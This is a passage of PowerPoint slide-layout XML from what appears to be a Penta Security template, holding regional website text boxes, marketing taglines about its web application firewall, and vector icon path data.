                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="6858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lvl="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="7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KOREA</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="7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GLOBAL</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="7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JAPAN</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="7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4" name="TextBox 373">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B86CE9D-981A-A844-B016-BB758B53D834}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3741963" y="3174600"/>
              <a:ext cx="1015929" cy="576162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lvl="0" indent="0" defTabSz="914400" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPts val="1400"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr kumimoji="1" sz="800" b="0">
                  <a:solidFill>
                    <a:srgbClr val="727171"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="6858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 latinLnBrk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lvl="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="700" dirty="0" err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www.pentasecurity.co.kr</a:t>
              </a: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ko-KR" sz="700" dirty="0" err="1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www.pentasecurity.com</a:t>
              </a:r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lvl="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="700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www.pentasecurity.co.jp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AC20500-EB07-C044-B1D9-02858256C92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="739309" y="5588203"/>
            <a:ext cx="7665382" cy="791974"/>
            <a:chOff x="739309" y="5588203"/>
            <a:chExt cx="7665382" cy="791974"/>
          </a:xfrm>
        </p:grpSpPr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DB69646E-8949-904A-B26D-AA3F2249DDCF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5717032" y="5645185"/>
              <a:ext cx="534503" cy="734980"/>
              <a:chOff x="2707134" y="5645185"/>
              <a:chExt cx="534503" cy="734980"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="159" name="Shape 109">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5214DD20-1C7C-B94A-85E7-DD3BBE714DDA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2707134" y="6103166"/>
                <a:ext cx="53450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No.1 WAF Vendor in the APAC Region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  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="160" name="그룹 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D7F36A-C058-6D4C-A750-DE65365FFA2B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2800482" y="5645185"/>
                <a:ext cx="347768" cy="348518"/>
                <a:chOff x="8491474" y="12120586"/>
                <a:chExt cx="2206625" cy="221138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61" name="Freeform 32">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17E52F19-DB31-114D-BDF3-C4CA3FC9AA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799" y="12663511"/>
                  <a:ext cx="635000" cy="1122363"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 103 w 150"/>
                    <a:gd name="T1" fmla="*/ 0 h 265"/>
                    <a:gd name="T2" fmla="*/ 53 w 150"/>
                    <a:gd name="T3" fmla="*/ 0 h 265"/>
                    <a:gd name="T4" fmla="*/ 49 w 150"/>
                    <a:gd name="T5" fmla="*/ 17 h 265"/>
                    <a:gd name="T6" fmla="*/ 37 w 150"/>
                    <a:gd name="T7" fmla="*/ 29 h 265"/>
                    <a:gd name="T8" fmla="*/ 36 w 150"/>
                    <a:gd name="T9" fmla="*/ 29 h 265"/>
                    <a:gd name="T10" fmla="*/ 36 w 150"/>
                    <a:gd name="T11" fmla="*/ 29 h 265"/>
                    <a:gd name="T12" fmla="*/ 24 w 150"/>
                    <a:gd name="T13" fmla="*/ 33 h 265"/>
                    <a:gd name="T14" fmla="*/ 21 w 150"/>
                    <a:gd name="T15" fmla="*/ 34 h 265"/>
                    <a:gd name="T16" fmla="*/ 0 w 150"/>
                    <a:gd name="T17" fmla="*/ 36 h 265"/>
                    <a:gd name="T18" fmla="*/ 0 w 150"/>
                    <a:gd name="T19" fmla="*/ 79 h 265"/>
                    <a:gd name="T20" fmla="*/ 0 w 150"/>
                    <a:gd name="T21" fmla="*/ 79 h 265"/>
                    <a:gd name="T22" fmla="*/ 36 w 150"/>
                    <a:gd name="T23" fmla="*/ 79 h 265"/>
                    <a:gd name="T24" fmla="*/ 48 w 150"/>
                    <a:gd name="T25" fmla="*/ 79 h 265"/>
                    <a:gd name="T26" fmla="*/ 48 w 150"/>
                    <a:gd name="T27" fmla="*/ 218 h 265"/>
                    <a:gd name="T28" fmla="*/ 0 w 150"/>
                    <a:gd name="T29" fmla="*/ 218 h 265"/>
                    <a:gd name="T30" fmla="*/ 0 w 150"/>
                    <a:gd name="T31" fmla="*/ 265 h 265"/>
                    <a:gd name="T32" fmla="*/ 98 w 150"/>
                    <a:gd name="T33" fmla="*/ 265 h 265"/>
                    <a:gd name="T34" fmla="*/ 112 w 150"/>
                    <a:gd name="T35" fmla="*/ 265 h 265"/>
                    <a:gd name="T36" fmla="*/ 150 w 150"/>
                    <a:gd name="T37" fmla="*/ 265 h 265"/>
                    <a:gd name="T38" fmla="*/ 150 w 150"/>
                    <a:gd name="T39" fmla="*/ 218 h 265"/>
                    <a:gd name="T40" fmla="*/ 103 w 150"/>
                    <a:gd name="T41" fmla="*/ 218 h 265"/>
                    <a:gd name="T42" fmla="*/ 103 w 150"/>
                    <a:gd name="T43" fmla="*/ 0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0" h="265">
                      <a:moveTo>
                        <a:pt x="103" y="0"/>
                      </a:move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7"/>
                        <a:pt x="51" y="13"/>
                        <a:pt x="49" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="22"/>
                        <a:pt x="42" y="26"/>
                        <a:pt x="37" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="29"/>
                        <a:pt x="36" y="29"/>
                        <a:pt x="36" y="29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33" y="31"/>
                        <a:pt x="29" y="32"/>
                        <a:pt x="24" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="33"/>
                        <a:pt x="22" y="34"/>
                        <a:pt x="21" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="35"/>
                        <a:pt x="7" y="36"/>
                        <a:pt x="0" y="36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36" y="79"/>
                        <a:pt x="36" y="79"/>
                        <a:pt x="36" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="79"/>
                        <a:pt x="48" y="79"/>
                        <a:pt x="48" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="218"/>
                        <a:pt x="48" y="218"/>
                        <a:pt x="48" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="218"/>
                        <a:pt x="0" y="218"/>
                        <a:pt x="0" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="265"/>
                        <a:pt x="0" y="265"/>
                        <a:pt x="0" y="265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="265"/>
                        <a:pt x="98" y="265"/>
                        <a:pt x="98" y="265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="112" y="265"/>
                        <a:pt x="112" y="265"/>
                        <a:pt x="112" y="265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="265"/>
                        <a:pt x="150" y="265"/>
                        <a:pt x="150" y="265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="218"/>
                        <a:pt x="150" y="218"/>
                        <a:pt x="150" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="218"/>
                        <a:pt x="103" y="218"/>
                        <a:pt x="103" y="218"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10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62" name="Freeform 33">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC08A6B-E742-6B44-BF10-AFCB3836326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491474" y="12120586"/>
                  <a:ext cx="2206625" cy="2211388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 521"/>
                    <a:gd name="T1" fmla="*/ 261 h 522"/>
                    <a:gd name="T2" fmla="*/ 521 w 521"/>
                    <a:gd name="T3" fmla="*/ 261 h 522"/>
                    <a:gd name="T4" fmla="*/ 351 w 521"/>
                    <a:gd name="T5" fmla="*/ 38 h 522"/>
                    <a:gd name="T6" fmla="*/ 422 w 521"/>
                    <a:gd name="T7" fmla="*/ 188 h 522"/>
                    <a:gd name="T8" fmla="*/ 377 w 521"/>
                    <a:gd name="T9" fmla="*/ 200 h 522"/>
                    <a:gd name="T10" fmla="*/ 367 w 521"/>
                    <a:gd name="T11" fmla="*/ 163 h 522"/>
                    <a:gd name="T12" fmla="*/ 351 w 521"/>
                    <a:gd name="T13" fmla="*/ 95 h 522"/>
                    <a:gd name="T14" fmla="*/ 261 w 521"/>
                    <a:gd name="T15" fmla="*/ 502 h 522"/>
                    <a:gd name="T16" fmla="*/ 241 w 521"/>
                    <a:gd name="T17" fmla="*/ 500 h 522"/>
                    <a:gd name="T18" fmla="*/ 292 w 521"/>
                    <a:gd name="T19" fmla="*/ 417 h 522"/>
                    <a:gd name="T20" fmla="*/ 256 w 521"/>
                    <a:gd name="T21" fmla="*/ 448 h 522"/>
                    <a:gd name="T22" fmla="*/ 27 w 521"/>
                    <a:gd name="T23" fmla="*/ 318 h 522"/>
                    <a:gd name="T24" fmla="*/ 84 w 521"/>
                    <a:gd name="T25" fmla="*/ 299 h 522"/>
                    <a:gd name="T26" fmla="*/ 153 w 521"/>
                    <a:gd name="T27" fmla="*/ 240 h 522"/>
                    <a:gd name="T28" fmla="*/ 169 w 521"/>
                    <a:gd name="T29" fmla="*/ 207 h 522"/>
                    <a:gd name="T30" fmla="*/ 142 w 521"/>
                    <a:gd name="T31" fmla="*/ 235 h 522"/>
                    <a:gd name="T32" fmla="*/ 78 w 521"/>
                    <a:gd name="T33" fmla="*/ 288 h 522"/>
                    <a:gd name="T34" fmla="*/ 23 w 521"/>
                    <a:gd name="T35" fmla="*/ 300 h 522"/>
                    <a:gd name="T36" fmla="*/ 261 w 521"/>
                    <a:gd name="T37" fmla="*/ 20 h 522"/>
                    <a:gd name="T38" fmla="*/ 282 w 521"/>
                    <a:gd name="T39" fmla="*/ 41 h 522"/>
                    <a:gd name="T40" fmla="*/ 218 w 521"/>
                    <a:gd name="T41" fmla="*/ 97 h 522"/>
                    <a:gd name="T42" fmla="*/ 203 w 521"/>
                    <a:gd name="T43" fmla="*/ 138 h 522"/>
                    <a:gd name="T44" fmla="*/ 211 w 521"/>
                    <a:gd name="T45" fmla="*/ 137 h 522"/>
                    <a:gd name="T46" fmla="*/ 213 w 521"/>
                    <a:gd name="T47" fmla="*/ 129 h 522"/>
                    <a:gd name="T48" fmla="*/ 222 w 521"/>
                    <a:gd name="T49" fmla="*/ 109 h 522"/>
                    <a:gd name="T50" fmla="*/ 224 w 521"/>
                    <a:gd name="T51" fmla="*/ 103 h 522"/>
                    <a:gd name="T52" fmla="*/ 257 w 521"/>
                    <a:gd name="T53" fmla="*/ 89 h 522"/>
                    <a:gd name="T54" fmla="*/ 312 w 521"/>
                    <a:gd name="T55" fmla="*/ 26 h 522"/>
                    <a:gd name="T56" fmla="*/ 339 w 521"/>
                    <a:gd name="T57" fmla="*/ 96 h 522"/>
                    <a:gd name="T58" fmla="*/ 362 w 521"/>
                    <a:gd name="T59" fmla="*/ 174 h 522"/>
                    <a:gd name="T60" fmla="*/ 366 w 521"/>
                    <a:gd name="T61" fmla="*/ 193 h 522"/>
                    <a:gd name="T62" fmla="*/ 366 w 521"/>
                    <a:gd name="T63" fmla="*/ 220 h 522"/>
                    <a:gd name="T64" fmla="*/ 430 w 521"/>
                    <a:gd name="T65" fmla="*/ 198 h 522"/>
                    <a:gd name="T66" fmla="*/ 501 w 521"/>
                    <a:gd name="T67" fmla="*/ 252 h 522"/>
                    <a:gd name="T68" fmla="*/ 412 w 521"/>
                    <a:gd name="T69" fmla="*/ 278 h 522"/>
                    <a:gd name="T70" fmla="*/ 322 w 521"/>
                    <a:gd name="T71" fmla="*/ 290 h 522"/>
                    <a:gd name="T72" fmla="*/ 328 w 521"/>
                    <a:gd name="T73" fmla="*/ 301 h 522"/>
                    <a:gd name="T74" fmla="*/ 361 w 521"/>
                    <a:gd name="T75" fmla="*/ 300 h 522"/>
                    <a:gd name="T76" fmla="*/ 476 w 521"/>
                    <a:gd name="T77" fmla="*/ 245 h 522"/>
                    <a:gd name="T78" fmla="*/ 261 w 521"/>
                    <a:gd name="T79" fmla="*/ 502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521" h="522">
                      <a:moveTo>
                        <a:pt x="261" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="117" y="0"/>
                        <a:pt x="0" y="117"/>
                        <a:pt x="0" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="405"/>
                        <a:pt x="117" y="522"/>
                        <a:pt x="261" y="522"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="404" y="522"/>
                        <a:pt x="521" y="405"/>
                        <a:pt x="521" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="521" y="117"/>
                        <a:pt x="404" y="0"/>
                        <a:pt x="261" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="351" y="38"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="398" y="57"/>
                        <a:pt x="437" y="90"/>
                        <a:pt x="464" y="132"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="463" y="145"/>
                        <a:pt x="448" y="165"/>
                        <a:pt x="422" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="394" y="213"/>
                        <a:pt x="377" y="213"/>
                        <a:pt x="374" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="373" y="210"/>
                        <a:pt x="373" y="206"/>
                        <a:pt x="377" y="200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="383" y="191"/>
                        <a:pt x="385" y="183"/>
                        <a:pt x="383" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="381" y="169"/>
                        <a:pt x="374" y="166"/>
                        <a:pt x="367" y="163"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="358" y="159"/>
                        <a:pt x="353" y="156"/>
                        <a:pt x="353" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="353" y="129"/>
                        <a:pt x="352" y="111"/>
                        <a:pt x="351" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="350" y="74"/>
                        <a:pt x="349" y="47"/>
                        <a:pt x="351" y="38"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="261" y="502"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="502"/>
                        <a:pt x="248" y="501"/>
                        <a:pt x="241" y="501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="501"/>
                        <a:pt x="241" y="500"/>
                        <a:pt x="241" y="500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="238" y="494"/>
                        <a:pt x="253" y="473"/>
                        <a:pt x="266" y="455"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="444"/>
                        <a:pt x="283" y="431"/>
                        <a:pt x="292" y="417"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="277" y="417"/>
                        <a:pt x="277" y="417"/>
                        <a:pt x="277" y="417"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="270" y="428"/>
                        <a:pt x="263" y="438"/>
                        <a:pt x="256" y="448"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="470"/>
                        <a:pt x="228" y="486"/>
                        <a:pt x="228" y="499"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="486"/>
                        <a:pt x="50" y="413"/>
                        <a:pt x="27" y="318"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="318"/>
                        <a:pt x="31" y="319"/>
                        <a:pt x="34" y="319"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="319"/>
                        <a:pt x="64" y="310"/>
                        <a:pt x="84" y="299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="96" y="292"/>
                        <a:pt x="109" y="285"/>
                        <a:pt x="123" y="279"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="139" y="272"/>
                        <a:pt x="146" y="255"/>
                        <a:pt x="153" y="240"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="228"/>
                        <a:pt x="163" y="219"/>
                        <a:pt x="169" y="216"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="169" y="207"/>
                        <a:pt x="169" y="207"/>
                        <a:pt x="169" y="207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55" y="207"/>
                        <a:pt x="148" y="222"/>
                        <a:pt x="142" y="235"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="249"/>
                        <a:pt x="130" y="262"/>
                        <a:pt x="117" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="274"/>
                        <a:pt x="90" y="281"/>
                        <a:pt x="78" y="288"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="300"/>
                        <a:pt x="37" y="310"/>
                        <a:pt x="28" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="304"/>
                        <a:pt x="25" y="302"/>
                        <a:pt x="23" y="300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="287"/>
                        <a:pt x="20" y="274"/>
                        <a:pt x="20" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="128"/>
                        <a:pt x="128" y="20"/>
                        <a:pt x="261" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="20"/>
                        <a:pt x="286" y="21"/>
                        <a:pt x="299" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="295" y="28"/>
                        <a:pt x="288" y="36"/>
                        <a:pt x="282" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="271" y="52"/>
                        <a:pt x="256" y="66"/>
                        <a:pt x="246" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="241" y="90"/>
                        <a:pt x="229" y="94"/>
                        <a:pt x="218" y="97"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="101"/>
                        <a:pt x="196" y="104"/>
                        <a:pt x="193" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="123"/>
                        <a:pt x="198" y="132"/>
                        <a:pt x="203" y="138"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="138"/>
                        <a:pt x="203" y="138"/>
                        <a:pt x="203" y="138"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="206" y="138"/>
                        <a:pt x="209" y="138"/>
                        <a:pt x="211" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="215" y="137"/>
                        <a:pt x="217" y="136"/>
                        <a:pt x="218" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="216" y="134"/>
                        <a:pt x="214" y="131"/>
                        <a:pt x="213" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="204" y="121"/>
                        <a:pt x="205" y="117"/>
                        <a:pt x="205" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="206" y="114"/>
                        <a:pt x="215" y="111"/>
                        <a:pt x="222" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="109"/>
                        <a:pt x="223" y="109"/>
                        <a:pt x="224" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="224" y="103"/>
                        <a:pt x="224" y="103"/>
                        <a:pt x="224" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="103"/>
                        <a:pt x="240" y="103"/>
                        <a:pt x="240" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="246" y="99"/>
                        <a:pt x="253" y="95"/>
                        <a:pt x="257" y="89"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="266" y="74"/>
                        <a:pt x="280" y="61"/>
                        <a:pt x="291" y="50"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="40"/>
                        <a:pt x="308" y="33"/>
                        <a:pt x="312" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="321" y="28"/>
                        <a:pt x="331" y="31"/>
                        <a:pt x="340" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="337" y="45"/>
                        <a:pt x="337" y="65"/>
                        <a:pt x="339" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="340" y="112"/>
                        <a:pt x="340" y="129"/>
                        <a:pt x="341" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="341" y="164"/>
                        <a:pt x="353" y="170"/>
                        <a:pt x="362" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="366" y="176"/>
                        <a:pt x="370" y="178"/>
                        <a:pt x="371" y="181"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="372" y="182"/>
                        <a:pt x="371" y="186"/>
                        <a:pt x="366" y="193"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="366" y="194"/>
                        <a:pt x="366" y="194"/>
                        <a:pt x="366" y="194"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="356" y="209"/>
                        <a:pt x="363" y="218"/>
                        <a:pt x="366" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="369" y="223"/>
                        <a:pt x="373" y="224"/>
                        <a:pt x="378" y="224"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="392" y="224"/>
                        <a:pt x="411" y="215"/>
                        <a:pt x="430" y="198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="447" y="183"/>
                        <a:pt x="465" y="164"/>
                        <a:pt x="473" y="147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="490" y="178"/>
                        <a:pt x="500" y="214"/>
                        <a:pt x="501" y="252"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="496" y="244"/>
                        <a:pt x="489" y="236"/>
                        <a:pt x="481" y="233"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="460" y="225"/>
                        <a:pt x="437" y="240"/>
                        <a:pt x="412" y="278"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="401" y="294"/>
                        <a:pt x="383" y="291"/>
                        <a:pt x="363" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="348" y="285"/>
                        <a:pt x="333" y="282"/>
                        <a:pt x="322" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="322" y="315"/>
                        <a:pt x="322" y="315"/>
                        <a:pt x="322" y="315"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="323" y="308"/>
                        <a:pt x="325" y="303"/>
                        <a:pt x="328" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="331" y="298"/>
                        <a:pt x="335" y="297"/>
                        <a:pt x="341" y="297"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="347" y="297"/>
                        <a:pt x="354" y="298"/>
                        <a:pt x="361" y="300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="381" y="303"/>
                        <a:pt x="407" y="308"/>
                        <a:pt x="422" y="285"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="443" y="253"/>
                        <a:pt x="462" y="239"/>
                        <a:pt x="476" y="245"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="488" y="249"/>
                        <a:pt x="496" y="267"/>
                        <a:pt x="500" y="282"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="490" y="405"/>
                        <a:pt x="386" y="502"/>
                        <a:pt x="261" y="50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</p:grpSp>
        </p:grp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6DF85F35-F13E-1C4A-BA87-A1C378E74693}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7057477" y="5645205"/>
              <a:ext cx="636830" cy="731567"/>
              <a:chOff x="1933650" y="5645205"/>
              <a:chExt cx="636830" cy="731567"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="164" name="Shape 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCEF7A67-F791-2640-A1A8-B72C16C170CB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1933650" y="6103158"/>
                <a:ext cx="636830" cy="273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The First and Only CCEAL4 Certified WAF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  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="165" name="그룹 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79339F51-3CB8-CC49-9813-5576F3302E44}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2077806" y="5645205"/>
                <a:ext cx="348519" cy="348519"/>
                <a:chOff x="20223099" y="12120586"/>
                <a:chExt cx="2211388" cy="221138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66" name="Freeform 165">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
